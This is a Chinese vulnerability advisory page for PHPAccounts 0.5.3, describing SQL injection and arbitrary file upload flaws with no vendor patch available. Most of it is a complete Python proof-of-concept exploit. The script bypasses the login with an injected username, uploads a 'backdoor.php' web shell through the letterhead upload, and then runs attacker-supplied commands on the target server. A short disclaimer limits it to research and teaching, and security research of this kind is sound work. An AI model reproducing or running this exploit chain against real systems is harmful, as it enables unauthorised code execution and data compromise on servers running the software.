Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / PHPAccounts SQL注入和任意文件上传漏洞

发布日期:2012-06-11
更新日期:2012-06-21受影响系统:
phpaccounts phpaccounts
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53920PHPAccounts是针对小型企业、自由职业者、咨询公司的简单的基于Web的账号应用。PHPAccounts中存在SQL注入漏洞和任意文件上传漏洞,这些漏洞源于未验证用户提供的数据。攻击者可利用该漏洞操控应用程序,执行任意代码,访问或修改数据,或在底层数据库中利用这些漏洞。<*来源:loneferret
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/pythonimport re, mechanize
import urllib, sysprint " [*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"print "[*] Offensive Security - http://www.offensive-security.com "
if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)rhost = sys.argv[1]
rcmd = sys.argv[2]
print "[*] Bypassing Login ."
try:
        br = mechanize.Browser()
        br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
        assert br.viewing_html()
        br.select_form(name="loginForm")
        br.select_form(nr=0)
        br.form["Login_Username"] = "x" or "1"#"
        br.form["Login_Password"] = "pwnd"
        print "[*] Triggering SQLi .."
        br.submit()
except:
        print "[*] Oups..Something happened"
        exit(0)print "[*] Uploading Shell ..."
try:
        br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
        assert br.viewing_html()
        br.select_form(nr=0)
        br.form["Preferences[LETTER_HEADER]"] = "test"
        br.form.add_file(open("backdoor.php"), "text/plain", "backdoor.php", name="letterhead_image")
        br.submit(nr=2)
except:
        print "[*] Upload didn"t work"
        exit(0)print "[*] Command Executed "
try:
        shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
        print shell.read()
except:
        print "[*] Oups."
        exit(0)建议:
--------------------------------------------------------------------------------
厂商补丁:phpaccounts
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://phpaccounts.com/LibTIFF “tiff2pdf”整数溢出漏洞Joomla! Alphacontent组件‘limitstart’参数SQL注入漏洞相关资讯      任意文件上传漏洞  PHPAccounts  PHPAccounts漏洞 
  • Drupal Live CSS模块任意文件上传  (01/22/2013 16:45:18)
  • BigDump 跨站脚本、SQL注入、任意  (12/04/2012 06:49:45)
  • sflog! <= 1.00 任意文件上传漏洞  (11/05/2012 06:51:50)
  • WordPress 多个CMSMasters主题"  (12/20/2012 12:33:48)
  • FCKEditor "FileUpload()"函数任意  (12/01/2012 09:28:48)
  • WordPress Guest Posting插件"  (10/16/2012 06:38:57)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已